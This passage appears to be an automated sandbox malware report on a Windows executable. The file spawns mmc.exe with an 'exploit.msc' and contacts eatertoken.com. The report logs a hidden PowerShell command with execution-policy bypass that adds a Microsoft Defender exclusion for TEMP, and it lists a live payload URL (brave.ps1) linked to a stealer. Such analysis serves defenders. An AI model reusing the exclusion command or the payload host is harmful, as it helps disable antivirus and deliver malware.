Code function: 0_2_00007FF71F64B190 SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF71F64B190

Source: C:\Users\user\Desktop\IPt9U27NoX.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\exploit.msc"			Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath $env:TEMP}			Jump to behavior

Source: C:\Users\user\Desktop\IPt9U27NoX.exe

Code function: 0_2_00007FF71F649D90 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,CopySid,SetEntriesInAclW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateDirectoryW,LocalFree,

0_2_00007FF71F649D90

Source: C:\Users\user\Desktop\IPt9U27NoX.exe

Code function: 0_2_00007FF71F63DC70 cpuid

0_2_00007FF71F63DC70

Source: C:\Users\user\Desktop\IPt9U27NoX.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_00007FF71F64A2CC

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\IPt9U27NoX.exe

Code function: 0_2_00007FF71F650754 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF71F650754

Source: C:\Users\user\Desktop\IPt9U27NoX.exe

Code function: 0_2_00007FF71F634EB0 GetVersionExW,

0_2_00007FF71F634EB0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 PowerShell	Boot or Logon Initialization Scripts	11 Process Injection	1 Disable or Modify Tools	LSASS Memory	31 Security Software Discovery	Remote Desktop Protocol	1 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	41 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	44 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
IPt9U27NoX.exe	7%	Virustotal		Browse
IPt9U27NoX.exe	8%	ReversingLabs

Source	Detection	Scanner	Label
https://eatertoken.com/f7sjdjf2w1/brave/m/	0%	Avira URL Cloud	safe
https://eatertoken.com/f7sjdjf2w1/brave/a	0%	Avira URL Cloud	safe
https://eatertoken.com/f7sjdjf2w1/brave/HuL	0%	Avira URL Cloud	safe
https://eatertoken.com/f7sjdjf2w1/brave/f2w1/brave/...	0%	Avira URL Cloud	safe
https://eatertoken.com/f7sjdjf2w1/brave/	0%	Avira URL Cloud	safe
https://eatertoken.com/f7sjdjf2w1/brave/Q	0%	Avira URL Cloud	safe
https://eatertoken.com/f7sjdjf2w1/brave/https://eatertoken.com/f7sjdjf2w1/brave/	0%	Avira URL Cloud	safe
https://eatertoken.com/f7sjdjf2w1/brave/T	0%	Avira URL Cloud	safe
https://eatertoken.com/f7sjdjf2w1/brave/LQ	0%	Avira URL Cloud	safe
https://eatertoken.com/f7sjdjf2w1/payload/	0%	Avira URL Cloud	safe
https://eatertoken.com/f7sjdjf2w1/brave/w	0%	Avira URL Cloud	safe
https://eatertoken.com/	0%	Avira URL Cloud	safe
https://eatertoken.com/f7sjdjf2w1/brave/...:	0%	Avira URL Cloud	safe
https://eatertoken.com/f7sjdjf2w1/brave/#	0%	Avira URL Cloud	safe
https://eatertoken.com/f7sjdjf2w1/brave/.com/f7sjdjf2w1/brave/	0%	Avira URL Cloud	safe
https://eatertoken.com/f7sjdjf2w1/brave/.../brave/rave/	0%	Avira URL Cloud	safe
https://eatertoken.com/f7sjdjf2w1/brave/)	0%	Avira URL Cloud	safe
https://eatertoken.com/f7sjdjf2w1/payload/builds/brave.ps1	100%	Avira URL Cloud	malware
https://eatertoken.com/f7sjdjf2w1/brave/...R	0%	Avira URL Cloud	safe
https://ion=v4.5mConsumer	0%	Avira URL Cloud	safe
https://eatertoken.com/f7sjdjf2w1/brave/mC:	0%	Avira URL Cloud	safe
https://eatertoken.com/f7sjdjf2w1/brave/J	0%	Avira URL Cloud	safe
https://eatertoken.com/f7sjdjf2w1/brave/JQ	0%	Avira URL Cloud	safe
https://eatertoken.com/f7sjdjf2w1/brave/6	0%	Avira URL Cloud	safe
https://eatertoken.com/f7sjdjf2w1/brave/Dw	0%	Avira URL Cloud	safe
https://eatertoken.com/f7sjdjf2w1/brave/...	0%	Avira URL Cloud	safe
https://eatertoken.com/f7sjdjf2w1/brave/dows	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
eatertoken.com	104.21.84.99	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://eatertoken.com/f7sjdjf2w1/brave/	false	Avira URL Cloud: safe	unknown
https://eatertoken.com/f7sjdjf2w1/payload/builds/brave.ps1	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://eatertoken.com/f7sjdjf2w1/brave/m/	mmc.exe, 00000002.00000002.2363396353.0000000005164000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://eatertoken.com/f7sjdjf2w1/brave/a	mmc.exe, 00000002.00000002.2360752670.0000000001201000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://eatertoken.com/f7sjdjf2w1/brave/HuL	mmc.exe, 00000002.00000002.2364335222.0000000005488000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://eatertoken.com/f7sjdjf2w1/brave/f2w1/brave/...	mmc.exe, 00000002.00000002.2360752670.0000000001201000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.micom/pkiops/Docs/ry.htm0	powershell.exe, 00000003.00000002.1232325156.000001DEE9C53000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsps.ssl.com0?	IPt9U27NoX.exe	false		high
https://contoso.com/License	powershell.exe, 00000003.00000002.1225673230.000001DEE19D5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0	IPt9U27NoX.exe	false		high
http://osoft.co	powershell.exe, 00000003.00000002.1233072673.000001DEE9CE7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q	IPt9U27NoX.exe	false		high
http://ocsps.ssl.com0	IPt9U27NoX.exe	false		high
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 00000006.00000003.1204350093.0000028F3A410000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.dr	false		high
https://eatertoken.com/f7sjdjf2w1/brave/Q	mmc.exe, 00000002.00000002.2365168035.00000000055E0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0	IPt9U27NoX.exe	false		high
https://eatertoken.com/f7sjdjf2w1/brave/T	mmc.exe, 00000002.00000002.2365168035.00000000055E0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://eatertoken.com/f7sjdjf2w1/brave/https://eatertoken.com/f7sjdjf2w1/brave/	mmc.exe, 00000002.00000002.2363116247.00000000050B5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://eatertoken.com/	mmc.exe, 00000002.00000002.2363396353.0000000005164000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0	IPt9U27NoX.exe	false		high
https://g.live.com/odclientsettings/Prod.C:	edb.log.6.dr	false		high
https://eatertoken.com/f7sjdjf2w1/payload/	mmc.exe, 00000002.00000002.2365168035.00000000055FF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://eatertoken.com/f7sjdjf2w1/brave/LQ	mmc.exe, 00000002.00000002.2363396353.000000000512B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000003.00000002.1225673230.000001DEE19D5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.1225673230.000001DEE19D5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ssl.com/repository0	IPt9U27NoX.exe	false		high
https://eatertoken.com/f7sjdjf2w1/brave/...:	mmc.exe, 00000002.00000002.2365168035.00000000055E0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://eatertoken.com/f7sjdjf2w1/brave/w	mmc.exe, 00000002.00000002.2360752670.0000000001201000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://eatertoken.com/f7sjdjf2w1/brave/.../brave/rave/	mmc.exe, 00000002.00000002.2362495969.000000000351B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.1201613936.000001DED1961000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsps.ssl.com0P	IPt9U27NoX.exe	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.1225673230.000001DEE19D5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000003.00000002.1201613936.000001DED1B89000.00000004.00000800.00020000.00000000.sdmp	false		high
https://eatertoken.com/f7sjdjf2w1/brave/#	mmc.exe, 00000002.00000002.2363396353.00000000051B3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000003.00000002.1201613936.000001DED1B89000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000003.00000002.1201613936.000001DED1B89000.00000004.00000800.00020000.00000000.sdmp	false		high
https://eatertoken.com/f7sjdjf2w1/brave/)	mmc.exe, 00000002.00000002.2363396353.000000000512B000.00000004.00000020.00020000.00000000.sdmp, mmc.exe, 00000002.00000002.2360752670.0000000001201000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000003.00000002.1225673230.000001DEE19D5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 00000006.00000002.2364401648.0000028F3A600000.00000004.00000020.00020000.00000000.sdmp	false		high
http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0	IPt9U27NoX.exe	false		high
https://eatertoken.com/f7sjdjf2w1/brave/...R	mmc.exe, 00000002.00000002.2365168035.00000000055E0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://eatertoken.com/f7sjdjf2w1/brave/.com/f7sjdjf2w1/brave/	mmc.exe, 00000002.00000002.2360752670.0000000001201000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://eatertoken.com/f7sjdjf2w1/brave/mC:	mmc.exe, 00000002.00000002.2363396353.00000000051FD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000003.00000002.1201613936.000001DED1B89000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ion=v4.5mConsumer	powershell.exe, 00000003.00000002.1232325156.000001DEE9C91000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crls.ssl.com/ssl.com-rsa-RootCA.crl0	IPt9U27NoX.exe	false		high
http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0	IPt9U27NoX.exe	false		high
http://crl.micro	mmc.exe, 00000002.00000002.2365168035.00000000055F8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://eatertoken.com/f7sjdjf2w1/brave/JQ	mmc.exe, 00000002.00000002.2363396353.000000000512B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://eatertoken.com/f7sjdjf2w1/brave/J	mmc.exe, 00000002.00000002.2365168035.00000000055E0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000003.00000002.1201613936.000001DED1B89000.00000004.00000800.00020000.00000000.sdmp	false		high
https://eatertoken.com/f7sjdjf2w1/brave/6	mmc.exe, 00000002.00000002.2365168035.00000000055E0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000003.00000002.1201613936.000001DED1961000.00000004.00000800.00020000.00000000.sdmp	false		high
https://eatertoken.com/f7sjdjf2w1/brave/Dw	mmc.exe, 00000002.00000002.2363396353.0000000005164000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0	IPt9U27NoX.exe	false		high
https://eatertoken.com/f7sjdjf2w1/brave/...	mmc.exe, 00000002.00000002.2365168035.00000000055E0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://eatertoken.com/f7sjdjf2w1/brave/dows	mmc.exe, 00000002.00000002.2363396353.00000000051B3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.84.99	eatertoken.com	United States		13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1636991
Start date and time:	2025-03-13 10:47:44 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	IPt9U27NoX.exe renamed because original name is a hash value
Original Sample Name:	eef6cf314280f0a8bd7724dc8095783596fa6657ac95ee63a01c4b0228f26833.exe
Detection:	MAL
Classification:	mal63.evad.winEXE@8/13@1/2
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 84 Number of non-executed functions: 92
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.60.203.209, 20.109.210.53
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mmc.exe, PID 7672 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7784 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateValueKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:48:48	API Interceptor	21x Sleep call for process: powershell.exe modified
05:48:51	API Interceptor	2x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.21.84.99	brave.ps1	Get hash	malicious	Unknown	Browse
	https://r20.rs6.net/tn.jsp?f=001hpH3iFffMveYjStO_X-MvG9RPTAIiC6hH4aTZU7rVzcpvUP_ICqo36RUMXQVfsUqrm4g7z-3oSj0KQANPFyd7MBjWWS-bv6QWs7PqyxIwA-IwCQs4kQi1tfcYzCaVnvmTt7ZwML9C70thbxO1_yIGfcUEvxfwQDq&__=bkorn@drinkbodyarmor.com	Get hash	malicious	HTMLPhisher	Browse
	http://8c80.ltyrea.com	Get hash	malicious	Unknown	Browse
	https://8c80.ltyrea.com/	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
eatertoken.com	payload.ps1	Get hash	malicious	Kdot Stealer	Browse	206.166.251.99
	brave.ps1	Get hash	malicious	Unknown	Browse	104.21.84.99
	payload.ps1	Get hash	malicious	Kdot Stealer	Browse	206.166.251.99

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://metabussiness-helper-verify24h-now.abaytravel.com/meta-community-standard.php	Get hash	malicious	Unknown	Browse	104.18.11.207
	http://8868603.com/	Get hash	malicious	Unknown	Browse	172.67.151.6
	https://pub-a75ffa45639b4a91a804d5a002f48c9d.r2.dev/signs.html	Get hash	malicious	HTMLPhisher	Browse	172.66.0.235
	http://88686aa.com/	Get hash	malicious	Unknown	Browse	104.21.90.19
	http://87878y.com/	Get hash	malicious	Unknown	Browse	172.67.151.6
	https://allegrolokalnie.pl-745667434.icu/dostawa/pilarka-stihl-ms-362-cm---jak-nowa-970323	Get hash	malicious	HTMLPhisher	Browse	104.16.123.96
	http://888881e.com/	Get hash	malicious	Unknown	Browse	104.21.90.19
	http://86339w.com/	Get hash	malicious	Unknown	Browse	104.21.90.19
	http://88xggp.com/	Get hash	malicious	Unknown	Browse	104.21.90.19
	http://unbouncepages.com/uc61/	Get hash	malicious	Unknown	Browse	104.18.34.21

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	justificante de transferencia09454545.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.84.99
	443_2003_https-df.exe	Get hash	malicious	Metasploit	Browse	104.21.84.99
	443_2003_https-df.exe	Get hash	malicious	Metasploit	Browse	104.21.84.99
	faktura_FV2025020637756.html	Get hash	malicious	Unknown	Browse	104.21.84.99
	SecuriteInfo.com.FileRepMalware.26489.28570.exe	Get hash	malicious	Unknown	Browse	104.21.84.99
	Bill Of Ladding & PL AWB No.1669134316.vbs	Get hash	malicious	GuLoader	Browse	104.21.84.99
	Payment_Advise.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.84.99
	FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	104.21.84.99
